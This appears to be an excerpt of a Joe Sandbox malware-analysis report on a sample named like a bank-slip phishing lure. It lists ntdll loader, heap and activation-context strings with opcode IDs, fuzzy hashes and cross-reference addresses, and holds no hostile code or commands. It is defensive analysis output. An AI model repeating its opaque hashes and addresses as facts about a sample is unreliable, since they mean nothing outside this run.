                                                                                                        • Instruction ID: b56456bf2a3b015645bbed8d2c9a6868c1cd27c4494aba7032a9e77864ddf0aa
                                                                                                        • Opcode Fuzzy Hash: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
                                                                                                        • Instruction Fuzzy Hash: 75D1CD3150068ADFDB22EF68C454AAEFBF1FF59714F088049F646DB252CB349A81CB54
                                                                                                        Strings
                                                                                                        • HandleTraces, xrefs: 01818C8F
                                                                                                        • VerifierDlls, xrefs: 01818CBD
                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                                                                                        • VerifierDebug, xrefs: 01818CA5
                                                                                                        • VerifierFlags, xrefs: 01818C50
                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                        • API String ID: 0-3223716464
                                                                                                        • Opcode ID: 1202e28c91daf62bcf07835a1bd7d976266a849e4af15e3243aeb037add6e1d0
                                                                                                        • Instruction ID: db89ab7744d3b2062286a57ae94b55f5c21f31bf0471a90ab9b6c44331d9d551
                                                                                                        • Opcode Fuzzy Hash: 1202e28c91daf62bcf07835a1bd7d976266a849e4af15e3243aeb037add6e1d0
                                                                                                        • Instruction Fuzzy Hash: EC9126B3A41702AFD721EF6CC891B5AB7ACBB95B14F440518FA45EB249C7309F00CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        • Opcode ID: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                                                                                        • Instruction ID: 1276a95d85ec0c85eaff2984f4ffcef24f758cd0e0fd5357ee88197a1f6551b5
                                                                                                        • Opcode Fuzzy Hash: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                                                                                        • Instruction Fuzzy Hash: BF911670B407199BDB26EF58DC89BAEFBA1AF50B14F14016CEA10A73C5D7709B01CB91
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                                                                                        • apphelp.dll, xrefs: 01786496
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                                                                                        • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        • Opcode ID: 7f77c5d0c9ecd46ed80db40a559fc1810c76121ef93ddb697e669148815186df
                                                                                                        • Instruction ID: 4b51ad07b0b7a532382c3a53914e0d43fadfea0961489d00612ea30b44f7ed84
                                                                                                        • Opcode Fuzzy Hash: 7f77c5d0c9ecd46ed80db40a559fc1810c76121ef93ddb697e669148815186df
                                                                                                        • Instruction Fuzzy Hash: 5751B271248304AFD721EF28D855BABF7E4EF88748F10092DFA5597265D630EA44CB92
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01802165
                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                        • API String ID: 0-861424205
                                                                                                        • Opcode ID: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                                                                                        • Instruction ID: 0d5dcc37e4738e394b2a7fb7f8c65bcc18c4a0b4a952e4071d276e6649957d79
                                                                                                        • Opcode Fuzzy Hash: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                                                                                        • Instruction Fuzzy Hash: 32310B76B40219B7FB229A998C99F6ABB79DB54F50F05006DBB04F7141D2B0AB01C6A1
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                                                                                        • LdrpInitializeProcess, xrefs: 017CC6C4
                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-475462383
                                                                                                        • Opcode ID: 2992276b0689bac05fc3452a09a2cf265368e852d1a483159e76274559d5b288
                                                                                                        • Instruction ID: 6ba8f23757e1a8a85c5371151c2761ced6d67799e9cdf9b7095b9cdc45ff1f79
                                                                                                        • Opcode Fuzzy Hash: 2992276b0689bac05fc3452a09a2cf265368e852d1a483159e76274559d5b288
                                                                                                        • Instruction Fuzzy Hash: 213115B16443469FC215EF2CDD49E1AF7D4EF94B14F00056CF944AB295E720EE04CBA2
                                                                                                        APIs
                                                                                                          • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        • Opcode ID: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                                                                                        • Instruction ID: 93b4033f54ffeb3352e9456e7684389de2f9e3d6ead577c080fc3f5fe2247a6c
                                                                                                        • Opcode Fuzzy Hash: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                                                                                        • Instruction Fuzzy Hash: 75427E71900719DFDB61CF28C884BAAB7F4FF48314F1445AAE989DB246D770AA84CF61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        • Opcode ID: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                                                                                        • Instruction ID: 459029db37cbaaea54f8ba93788b9483935ef89f137d4535fc904bcc6c80294d
                                                                                                        • Opcode Fuzzy Hash: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                                                                                        • Instruction Fuzzy Hash: BAC169752093828FDB11CF58D044B6AF7E4BF94704F1489AEFA958B361E734CA49CB92
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                                                                                        • LdrpInitializeProcess, xrefs: 017C8422
                                                                                                        • @, xrefs: 017C8591
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        • Opcode ID: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                                                                                        • Instruction ID: ea78b7b830fda6a6f7a884579b40e37992d5d55eb0ed3914b6d7baf593da3f91
                                                                                                        • Opcode Fuzzy Hash: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                                                                                        • Instruction Fuzzy Hash: 43916B71508349AFD722DF65CC44FABFAE8AF98B44F40092EFA84D6155E374DA048B62
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                                                                                        • .Local, xrefs: 017C28D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                        • API String ID: 0-1239276146
                                                                                                        • Opcode ID: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                                                                                        • Instruction ID: 0fdd69dce77eca76bcfed7f106b2cd65dd83996ee1099752ff1129c0e0ff02af
                                                                                                        • Opcode Fuzzy Hash: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                                                                                        • Instruction Fuzzy Hash: 1CA1BD319402299FDB25CFA8CC88BA9F7B5BF58714F1541EDD908AB292D7709E80CF90
                                                                                                        Strings
                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                                                                                        • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                        • API String ID: 0-1245972979
                                                                                                        • Opcode ID: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                                                                                        • Instruction ID: 3a4e667c25644435cf25402a68f7cb2c3144390939ba6f44985dcae56ce11acf
                                                                                                        • Opcode Fuzzy Hash: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                                                                                        • Instruction Fuzzy Hash: 14611076600A16AFD7238F1CC895B2AF7E5BF90B10F15852DE9569F290C730E901CB91
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        • Opcode ID: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                                                                                        • Instruction ID: 7d5b141d6b296b2d68d788c8abd72c17a1feaac9b8b1fd15d259640f225f2f1e
                                                                                                        • Opcode Fuzzy Hash: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                                                                                        • Instruction Fuzzy Hash: E171D2B19043059FCB21EF18D888B9BBFE8AF55764F504568F9488B28AD734D588CBD2
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                                                                                        • apphelp.dll, xrefs: 017B2462
                                                                                                        • LdrpDynamicShimModule, xrefs: 017FA998
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        • Opcode ID: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                                                                                        • Instruction ID: 9e9fc4a28081b489c366faad7e6b581cfeec0f788a8fe95f6e6028afb36232fe
                                                                                                        • Opcode Fuzzy Hash: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                                                                                        • Instruction Fuzzy Hash: 67316C75610201ABDB31EF5DD884E6FF7B4FB80B00F25006DEA04AB345D770AA45CB40
                                                                                                        Strings
                                                                                                        • HEAP: , xrefs: 017A3264
                                                                                                        • HEAP[%wZ]: , xrefs: 017A3255
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        • API String ID: 0-617086771
                                                                                                        • Opcode ID: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                                                                                        • Instruction ID: 22f8397c079d1a99ddf1d1f3b29f958b2cce7e6c0511670ed78aa57932895ee9
                                                                                                        • Opcode Fuzzy Hash: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                                                                                        • Instruction Fuzzy Hash: 3C92AC71A046499FDB25CF68C444BAEFBF1FF88300F588299E959AB392D734A941CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        • Opcode ID: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                                                                                        • Instruction ID: 131777597f6c9aeeb8ae7cd073a10295ddb6ea276919f4595e2b4b18ec14d8bc
                                                                                                        • Opcode Fuzzy Hash: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                                                                                        • Instruction Fuzzy Hash: 27F1BE74600606DFEB15CF68C894B6AFBF5FF84300F5486A8E5169B391D734EA81CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        • API String ID: 0-1077428164
                                                                                                        • Opcode ID: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                                                                                        • Instruction ID: eb94983e7837a5293acfc5b0b9a8fabd8a21b1628fddf6745a4296182992abb2
                                                                                                        • Opcode Fuzzy Hash: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                                                                                        • Instruction Fuzzy Hash: C6C25D716083459FD729CF28C881BABFBE5AFC8754F04896DFA8987281D734D845CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        • Opcode ID: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                                        • Instruction ID: 2ff96cd6f5952122b817414a42943d8cd069e56501d6abef80a991aad495dd1d
                                                                                                        • Opcode Fuzzy Hash: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                                        • Instruction Fuzzy Hash: 8FA13C759016299BDB329B68CC88BE9F7F8EF48710F1041EADA09A7250D7359E85CF50
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                                                                                        • LdrpCheckModule, xrefs: 017FA117
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-161242083
                                                                                                        • Opcode ID: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                                                                                        • Instruction ID: 0a7363b1304584fa80dd9a79dc3c59007d39cdbae372c5a6ed8d2954f32227c5
                                                                                                        • Opcode Fuzzy Hash: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                                                                                        • Instruction Fuzzy Hash: 4E718A71A002069BDB25EF6CC985BBFF7B4EB88704F14446DE906AB355E734AA81CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-1334570610
                                                                                                        • Opcode ID: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                                        • Instruction ID: d7c19e86d45bc59341681f854f356f7ebc8a8d78e7309fca3bc62aa8f0d6ff53
                                                                                                        • Opcode Fuzzy Hash: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                                        • Instruction Fuzzy Hash: E361CF70600301DFDB29CF28C984B6AFBE1FF84308F548A9DE9468B292D770E941CB91
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1783798831
                                                                                                        • Opcode ID: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                                                                                        • Instruction ID: 0cdc558da4beae4c2f49c5474cf51f6baad59d87f76cd0ec0c469cdda50edfba
                                                                                                        • Opcode Fuzzy Hash: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                                                                                        • Instruction Fuzzy Hash: 5B4102B1944305ABC722EB68DC48B5BBBE8EF94B54F10492EF948D7295E730D900CB92
                                                                                                        Strings
                                                                                                        • @, xrefs: 0184C1F1
                                                                                                        • PreferredUILanguages, xrefs: 0184C212
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        • Opcode ID: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                                        • Instruction ID: c6080cd6b216677ce114bb2e7ad0d3dd8605179ab84eadedfe5a054d431ecf2b
                                                                                                        • Opcode Fuzzy Hash: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                                        • Instruction Fuzzy Hash: 16416271E0121EABDB11DED9C855BEEFBBCAB14704F14416AE609E7280EBB49B448B50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        • Opcode ID: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                                        • Instruction ID: a18def77393db30abc19ec269e1966914c300e8bbaceaca2f52516aa4819af0f
                                                                                                        • Opcode Fuzzy Hash: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                                        • Instruction Fuzzy Hash: B0412631A00668CBEB27DBE9C844BADFBB8FF56344F240559D901EB781D7748A81CB61
                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 0181488F
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-3154609507
                                                                                                        • Opcode ID: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
                                                                                                        • Instruction ID: 9ebadc0f0a0be3fd78143a923202b5cb2603f1b7ac3250b31daf65ed3d0f6809
                                                                                                        • Opcode Fuzzy Hash: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
